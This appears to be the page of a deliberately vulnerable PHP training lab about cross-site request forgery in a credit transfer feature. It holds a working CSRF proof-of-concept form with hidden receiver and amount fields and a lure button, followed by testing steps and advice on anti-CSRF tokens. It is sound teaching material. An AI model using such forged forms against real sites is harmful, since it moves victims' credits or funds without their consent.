PHP Session Memory User System

Credit Transfer - Easy

Bonus Easy

Goal: Log in as a victim account and trigger a cross-site credit transfer that returns a flag.

Hints

There is a transfer action but no effective CSRF validation on it.
The request only needs the same fields the normal form submits.
If the forged transfer succeeds from an external page, the lab now returns a flag.

Why This Works

State-changing actions without CSRF protection let an attacker ride the victim session. Once the victim is logged in, an attacker-controlled page can submit the transfer form and move credits as the victim.

Instructions:

Creating an Account:
- Navigate to the "Register" section.
- Enter a unique username.
- Enter a password.
- Click on the "Register" button.
- If successful, you will see a message saying "Registration successful!".
Logging In:
- Navigate to the "Login" section.
- Enter the username and password you registered with.
- Click on the "Login" button.
- If successful, you will see options for transferring credits and your current credit balance.

Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge.

<!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>CSRF PoC</title>
        </head>
        <body>

        <h2>CSRF Attack Example</h2>

        <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>

        <form action="TARGET_URL" method="post">
            <input type="hidden" name="receiver" value="user1">
            <input type="hidden" name="amount" value="100">
            <input type="submit" value="Click me for a surprise!">
        </form>

        </body>
        </html>

Create an HTML page with the necessary form.
Replace `TARGET_URL` with the URL where the original PHP page is hosted.
When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.

Testing the CSRF PoC:
- Log in to the original PHP website with any user account (e.g., user2).
- Visit the crafted CSRF PoC HTML page you created.
- Click on the provided button.
- Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
- Generate a unique token for every form displayed to the user.
- Store this token in the user's session and also send it as a hidden field in the form.
- On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
- This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.

Hide Instructions

Username	Credits
user1	5000
user2	4500
user3	4000

Credit Transfer - Easy

Instructions:

Register

Login

Users and Credits